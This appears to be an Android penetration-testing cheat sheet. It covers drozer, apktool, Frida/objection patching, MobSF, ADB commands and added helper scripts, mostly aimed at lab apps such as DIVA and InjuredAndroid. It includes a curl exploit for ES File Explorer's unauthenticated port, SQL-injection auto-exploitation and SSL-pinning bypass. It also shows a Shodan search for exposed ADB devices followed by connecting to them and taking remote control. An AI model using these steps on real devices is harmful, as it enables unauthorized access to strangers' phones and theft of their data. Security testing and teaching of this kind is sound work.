
Android Pentest




Port Scan on Android

As many random ports can be open on Android devices, it is always better to scan all 65535 ports rather than nmap's default top ports. RustScan does this quickly:

https://github.com/RustScan/RustScan/releases
# download the Debian package and install it
dpkg -i filename
rustscan -a 10.10.10.247

Now scan the open ports it found with nmap -sC -sV to run the default scripts and version detection (RustScan can hand them to nmap directly: rustscan -a 10.10.10.247 -- -sC -sV).

Installing ADB

sudo apt-get install android-tools-adb

Setting up Drozer

# Install drozer as a docker image
docker pull withsecurelabs/drozer

# Download the drozer agent and install it on Android
# https://github.com/WithSecureLabs/drozer-agent/releases/tag/3.0.0
# Drag and drop onto the emulator or install via adb, then open the agent and start its embedded server
adb install drozer-agent.apk

# On Windows, set up port forwarding for the emulator
adb forward tcp:31415 tcp:31415

# Get a docker shell
docker run --net host -it --entrypoint sh withsecurelabs/drozer

# Inside the container, start drozer
drozer console connect --server host.docker.internal

# Method II
# Find the phone's IP address under About
# Connect to the Android device using that IP address
docker run --net host -it withsecurelabs/drozer console connect --server 10.10.10.10

# Or get a shell in the container first and connect from there
docker run --net host -it --entrypoint sh withsecurelabs/drozer
drozer console connect --server <phone IP address>

Drozer Commands

# List all functionality
list

# List packages
run app.package.list

# Filter for a specific app keyword
run app.package.list -f diva

# Basic info
run app.package.info -a jakhar.aseem.diva

# List the attack surface: exported activities, broadcast receivers, content providers and services
run app.package.attacksurface jakhar.aseem.diva

# If the app has an exported activity
# Get activity info
run app.activity.info -a jakhar.aseem.diva

# View/access the exported activity if Permission: null
run app.activity.start --component jakhar.aseem.diva jakhar.aseem.diva.APICreds2Activity
run app.activity.start --component app.package app.activity.path

# You can open the exported activity directly from adb as well (am start -n takes package/component)
adb shell am start -n jakhar.aseem.diva/.APICreds2Activity

# If the app has providers
# Get info on content providers
run app.provider.info -a jakhar.aseem.diva

# Run the scanner to find provider URIs
# Take the content URIs listed under "For Sure Accessible Content URIs"
run scanner.provider.finduris -a jakhar.aseem.diva

# Query a provider URI
run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes/

# Look for injection vulnerabilities in the app's providers
run scanner.provider.injection -a jakhar.aseem.diva

# Automatically exploit SQL injection and print the tables
run scanner.provider.sqltables -a jakhar.aseem.diva

Static Analysis

# Decompile the application
apktool d application.apk

# Decompile without resources; use this when the app is too large
apktool d application.apk -r

# Search for strings in all locations
# Even the lib directory can contain useful source code or an API key
# Run strings on the .so/ELF files
# The smali directory contains the disassembled code, which is not very readable; use a dex-to-jar converter (or jadx) to get Java source

Locations to check for Secrets

- resources/res/values/strings.xml, xmls.xml, integers.xml, attrs.xml - look for the strings below:
  - firebase_database_url
  - google_api_key
  - google_app_id
  - google_crash_reporting_api_key
  - google_storage_bucket
  - client_id
  - API
  - password
  - AWS
  - Secret
  - http:// or https://
  - .db or .sqlite or SQL
- Better still, use jadx-gui from https://github.com/skylot/jadx/releases/tag/v1.5.0 and search across the whole decompiled project
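The same sweep as a script, added here as an example rather than anything from the original post or from the tools it names. It walks an apktool output directory, pulls the resource names from the list above out of res/values/*.xml, and runs a few regexes over every file (the .so files are read as bytes and decoded as latin-1, which is what makes them behave like `strings`). The AKIA/AIza prefixes are the documented AWS and Google key formats; the other patterns and the directory layout are my own assumptions. firebase_probe_url builds the unauthenticated read check for the Firebase section below.

```python
"""Secret sweep over an apktool output directory (added example, not the blog's own tooling).

Assumes the layout apktool produces (res/values/*.xml, smali/, lib/, assets/);
the resource names come from the list above, the regexes are my own choices.
"""
import os
import re
import sys
import xml.etree.ElementTree as ET

# Resource names from the list above that commonly carry secrets
INTERESTING_NAMES = {
    "firebase_database_url", "google_api_key", "google_app_id",
    "google_crash_reporting_api_key", "google_storage_bucket", "client_id",
}

# Indicators worth a closer look. The AWS/Google prefixes are the documented key formats;
# the rest are the keywords from the list above.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_\-]{35}\b"),
    "firebase_url": re.compile(r"https://[\w\-]+\.(?:firebaseio\.com|firebasedatabase\.app)"),
    "url": re.compile(r"https?://[^\s\"'<>]+"),
    "keyword": re.compile(r"(?i)\b(password|secret|api[_-]?key|aws)\b"),
    "database": re.compile(r"(?i)\b[\w\-]+\.(?:db|sqlite)\b"),
}


def scan_values_xml(path):
    """(name, value) pairs from a res/values XML whose resource name looks sensitive."""
    hits = []
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return hits
    for elem in root.iter():
        name = elem.get("name")
        if not name:
            continue
        lowered = name.lower()
        if name in INTERESTING_NAMES or "key" in lowered or "secret" in lowered:
            hits.append((name, (elem.text or "").strip()))
    return hits


def scan_blob(data, source):
    """Regex sweep over raw bytes decoded as latin-1, so .so/ELF files behave like `strings`."""
    text = data.decode("latin-1")
    findings = []
    for kind, rx in PATTERNS.items():
        for match in sorted(set(rx.findall(text))):
            findings.append({"file": source, "kind": kind, "match": match})
    return findings


def scan_apk_dir(root):
    """Walk a decoded APK; XML resources get the name check, every file gets the regex sweep."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if rel.startswith("res/values") and fn.endswith(".xml"):
                for name, value in scan_values_xml(path):
                    findings.append({"file": rel, "kind": "resource:" + name, "match": value})
            with open(path, "rb") as fh:
                findings.extend(scan_blob(fh.read(), rel))
    return findings


def firebase_probe_url(db_url):
    """Unauthenticated read check: an open Realtime Database answers GET <url>/.json with its contents."""
    return db_url.rstrip("/") + "/.json"


if __name__ == "__main__":
    for f in scan_apk_dir(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("%-40s %-28s %s" % (f["file"], f["kind"], f["match"]))
```

Run it as `python3 secrets_sweep.py application/` on the apktool output directory; expect noise from the url and keyword patterns, so read the resource: and key-format hits first.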

In AndroidManifest.xml, keywords to look for

- API keys
- Providers - Content Providers; find the ones which are exported
- SdkVersion (minSdkVersion / targetSdkVersion)
- Permissions
- Activities with android:exported="true" can be started/opened from an adb shell; just add a / before .activityname:
  am start b3nac.injuredandroid/.b25lActivity
- Make sure there is no sensitive data in any activity where exported="true"
- backup (android:allowBackup on the <application> tag, near the top of the manifest) - the application's data can be backed up and pulled
- Debug (android:debuggable)
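The manifest checks above, as an added example that is not part of the original post: it parses the text AndroidManifest.xml that apktool decodes, reports debuggable/allowBackup and the permissions, and lists every exported component together with the `am start -n` line or content:// authority to poke it with. The one thing worth the code is the implicit case: a component with no android:exported attribute but with an intent-filter is exported by default, which is exactly the one a grep for exported="true" misses. Component names in the test are constructed.

```python
"""Manifest triage for the exported/backup/debug checks above (added example, not from the blog).

Works on the text AndroidManifest.xml that apktool decodes; the am start / content://
lines it prints are built from the manifest, nothing is executed on a device.
"""
import sys
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")


def android(attr):
    """Namespaced attribute name for android:<attr>."""
    return "{%s}%s" % (ANDROID_NS, attr)


def is_exported(component):
    """An explicit android:exported wins; without it, a component that declares an
    intent-filter is exported by default (apps targeting API 31+ must state it explicitly)."""
    value = component.get(android("exported"))
    if value is not None:
        return value.lower() == "true", "android:exported=" + value
    if component.find("intent-filter") is not None:
        return True, "implicit: intent-filter without android:exported"
    return False, "not exported"


def triage_manifest(xml_text):
    root = ET.fromstring(xml_text)
    package = root.get("package")
    app = root.find("application")
    report = {
        "package": package,
        "debuggable": app.get(android("debuggable")) == "true",
        "allowBackup": app.get(android("allowBackup"), "true") == "true",  # defaults to true
        "permissions": [p.get(android("name")) for p in root.findall("uses-permission")],
        "exported": [],
    }
    for tag in COMPONENT_TAGS:
        for comp in app.findall(tag):
            exported, reason = is_exported(comp)
            if not exported:
                continue
            entry = {
                "type": tag,
                "name": comp.get(android("name")),
                "reason": reason,
                # a permission on the component still gates access even though it is exported
                "permission": comp.get(android("permission")),
            }
            if tag in ("activity", "activity-alias"):
                entry["poke"] = "adb shell am start -n %s/%s" % (package, entry["name"])
            elif tag == "provider":
                entry["poke"] = "content://%s/" % comp.get(android("authorities"))
            report["exported"].append(entry)
    return report


if __name__ == "__main__":
    with open(sys.argv[1], encoding="utf-8") as fh:
        rep = triage_manifest(fh.read())
    print("package=%s debuggable=%s allowBackup=%s" % (rep["package"], rep["debuggable"], rep["allowBackup"]))
    for e in rep["exported"]:
        print("%-9s %-45s %-50s %s" % (e["type"], e["name"], e["reason"], e.get("poke", "")))
```

Run it against `injuredAndroid/AndroidManifest.xml` after `apktool d`; every activity it prints can be tried with the am start line directly from `adb shell`, and each provider authority goes into drozer's app.provider.query.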

AWS Enumeration

Use the cloud_enum tool (available on GitHub), feeding it the bucket names, company names and AWS strings found in the resources above.

Firebase DB Enum

- See if you can find a Firebase URL in the source code; if yes, browse to it and see what you can find there
- dirb it and find any exposed content
- Find the DB from the APK using https://github.com/Sambal0x/firebaseEnum

git clone https://github.com/Sambal0x/firebaseEnum.git
cd firebaseEnum
python -m pip install -r requirements.txt
python3 firebaseEnum.py -k APK_Name

Abusing the ES File Explorer Vuln

The exploit can be downloaded from here

or you can abuse it with curl: ES File Explorer listens on TCP port 59777 and accepts JSON commands without any authentication.

curl --header "Content-Type: application/json" --request POST --data "{\"command\":\"listFiles\"}" http://192.168.0.105:59777

Installing and Setting up Frida & Objection

python -m pip install setuptools
python -m pip install frida-tools
python -m pip install objection

# Add the build-tools path to the PATH environment variable (update as required)
"C:\Users\name\AppData\Local\Android\Sdk\build-tools\34.0.0"

# Patch the apk with objection first; if that doesn't work, patch it manually with Frida
# A new apk is generated in the same directory as name.objection.apk
# Drag and drop the new apk into the Android emulator: uninstall the original apk and install the patched one
objection patchapk --source injuredAndroid.apk

Patching Manually using Frida

You can follow this tutorial

# Decompile without resources; use this when the app is too large
# (with -r the manifest stays binary, so add --force-manifest or drop -r if you need to edit the manifest below)
apktool d application.apk -r

# Go to the lib directory of the apk and into the architecture of the emulator
APK_NAME/lib/x86_64/

# Go to the Frida releases and download the gadget matching that architecture and your frida-tools version
frida-gadget-16.3.3-android-x86_64.so.xz
xz -d frida-gadget-16.3.3-android-x86_64.so.xz

# Rename the file to libfrida-gadget.so (System.loadLibrary("frida-gadget") looks for lib<name>.so) and copy it into APK_NAME/lib/x86_64/

# Paste the code below into any smali file which you know loads for sure - for example MainActivity.smali under APK_NAME/smali/Company/APK_NAME/ (e.g. injuredAndroid/smali/b3nac/injuredandroid/) - and save it.
# Put it at the start of a method that is definitely executed, such as onCreate, and make sure that method's .locals count is at least 1 so that v0 exists.
const-string v0, "frida-gadget"
invoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V

# Add the Internet permission to the manifest if it's not there already, so that the Frida gadget can open a socket
<uses-permission android:name="android.permission.INTERNET" />

# Rebuild the apk
apktool b injuredAndroid -o inured_patched.apk
apktool b DirectoryPath -o Output.apk

# Sign the APK
keytool -genkey -v -keystore custom.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
jarsigner -sigalg SHA1withRSA -digestalg SHA1 -keystore custom.keystore -storepass password inured_patched.apk mykeyaliasname
jarsigner -verify inured_patched.apk
# Note: jarsigner only produces a v1 signature; apps targeting API level 30 or higher need a v2+ signature, so sign those with apksigner from build-tools (run it after zipalign)

# Installing zipalign

nano /etc/apt/sources.list
# comment out the kali apt source and add the line below
deb http://ftp.de.debian.org/debian buster main
sudo apt update
sudo apt install zipalign
# (zipalign also ships in the Android SDK build-tools directory, which avoids mixing apt sources)

zipalign 4 inured_patched.apk inured_final.apk

# Drag and drop the final apk into the emulator and start the app
# Start objection and attach to the running app
objection explore

# Disable ssl pinning
android sslpinning disable

Dynamic Analysis with MobSF

# For Linux, download MobSF and run setup.sh, then run.sh
# For Windows, download Docker from https://docs.docker.com/desktop/install/windows-install/

# Set up MobSF
docker pull opensecurity/mobile-security-framework-mobsf:latest

# Run MobSF
docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest

# Or add a new environment variable
# Variable name: mobsf
# Variable value: docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
# From now on, type this on cmd to run MobSF on docker
%mobsf%

# Access the application at http://127.0.0.1:8000/login/ using the default creds mobsf/mobsf
# Add the path below to the PATH environment variable so MobSF can find the emulator
C:\Users\Bhanu\AppData\Local\Android\Sdk\emulator

ADB Commands

ADB Cheatsheet is here

#Forward the adb TCP port (5555) of a remote host to localhost over SSH
sudo ssh -p 22 -L 5555:127.0.0.1:5555 bhanu@steins.local

#Make the device's adbd listen on a TCP port (run while connected over USB; connect to the same port afterwards)
adb tcpip 9090

#Connect to the device (here through the SSH tunnel above)
adb connect 127.0.0.1:5555

#list connected devices
adb devices

#get a shell from a selected device
#adb -s device_name shell
adb -s 127.0.0.1:5555 shell


#get a shell
adb shell

#get root privs from a shell
su

#install an apk
adb -s "25sdfsfb3801745eg" install "C:\Users\bhanu\Downloads\shell.apk"

#Getting screenshots
adb shell screencap <path to save>

#Recording the screen
adb shell screenrecord <path to save>

#Downloading files
adb pull <source file path> <destination file path>

#Uploading files
adb push <source file path> <destination file path>

#Visiting websites
adb shell am start -a android.intent.action.VIEW -d <URL of the website>

#Getting system information
adb shell getprop

Find and Download an APK from Android

adb devices

# Find the package name (findstr on Windows; use grep on Linux/macOS)
adb shell pm list packages | findstr appname

# List the APK paths of the package; split APKs give more than one line
adb shell pm path com.appname

# Pull the base APK and every split
adb pull /data/app/~~jdOUJ5SxYWTgxtJXoghLTQ==/com.appname-LQcPJpxkhQL8gBcSOfevvg==/base.apk
adb pull /data/app/~~jdOUJ5SxYWTgxtJXoghLTQ==/com.appname-LQcPJpxkhQL8gBcSOfevvg==/split_config.xxhdpi.apk

Commands inside ADB Shell

# List available packages
pm list packages

# Find a specific package
pm list packages | grep Name

# Find the path of the package
pm path full_packageName
pm path b3nac.injuredandroid
package:/data/app/b3nac.injuredandroid-1/base.apk

# Download the apk back to the host machine
# Exit the adb shell first
exit
adb pull /data/app/b3nac.injuredandroid-1/base.apk injuredAndroid.apk

# In case you have multiple emulators open
adb -s emulator-5556 pull /data/app/b3nac.injuredandroid-1/base.apk injuredAndroid.apk

# You can now open the apk for static analysis
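The find/path/pull steps above as one script, added as an example (not from the blog): parse_pm_path reads the `package:` lines that `pm path` prints, one per APK, and pull_commands builds an `adb pull` per line, so split APKs (base.apk plus split_config.*.apk, as in the paths above) are all fetched instead of just base.apk. The `-s` serial handling covers the multiple-emulator case. The pm path output in the test is constructed from the paths shown above.

```python
"""Pull every APK of a package, split APKs included (added helper, not from the blog).
`pm path` prints one `package:/path` line per APK; newer Android installs apps under
/data/app/~~<hash>/<pkg>-<hash>/ with base.apk plus split_config.*.apk files, and all
of them are needed to reinstall or fully analyse the app."""
import os
import subprocess
import sys


def adb(serial=None):
    """adb argv prefix, with -s when several devices/emulators are attached."""
    return ["adb"] + (["-s", serial] if serial else [])


def parse_pm_path(output):
    """Paths from `pm path <pkg>` output; ignores anything that is not a package: line."""
    paths = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith("package:"):
            paths.append(line[len("package:"):])
    return paths


def pull_commands(paths, outdir, serial=None):
    """One adb pull per APK, keeping the on-device file name so splits stay distinguishable."""
    return [adb(serial) + ["pull", p, os.path.join(outdir, os.path.basename(p))] for p in paths]


def find_packages(keyword, serial=None):
    """Case-insensitive filter over `pm list packages` (the findstr/grep step above)."""
    out = subprocess.run(adb(serial) + ["shell", "pm", "list", "packages"],
                         capture_output=True, text=True, check=True).stdout
    return [l.split(":", 1)[1].strip() for l in out.splitlines()
            if l.startswith("package:") and keyword.lower() in l.lower()]


def pull_package(package, outdir, serial=None):
    """Resolve the APK paths on the device and pull each one into outdir."""
    out = subprocess.run(adb(serial) + ["shell", "pm", "path", package],
                         capture_output=True, text=True, check=True).stdout
    paths = parse_pm_path(out)
    if not paths:
        raise RuntimeError("no APK paths for %s; check the package name" % package)
    os.makedirs(outdir, exist_ok=True)
    for cmd in pull_commands(paths, outdir, serial):
        subprocess.run(cmd, check=True)
    return paths


if __name__ == "__main__":
    # usage: pull_apk.py <keyword> [serial]
    serial = sys.argv[2] if len(sys.argv) > 2 else None
    for pkg in find_packages(sys.argv[1], serial):
        print(pkg, pull_package(pkg, pkg, serial))
```

Usage: `python3 pull_apk.py injured emulator-5556` drops base.apk and any splits into a directory named after the package; the base.apk is what apktool and jadx want, the splits matter when you reinstall a patched build with `adb install-multiple`.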

Finding Devices on Shodan

# Shodan search query
android debug bridge
# Connect to an exposed adb port (5555) from the results
adb connect 100.100.100.100:5555

Get Remote Access of a device

apt install scrcpy
scrcpy
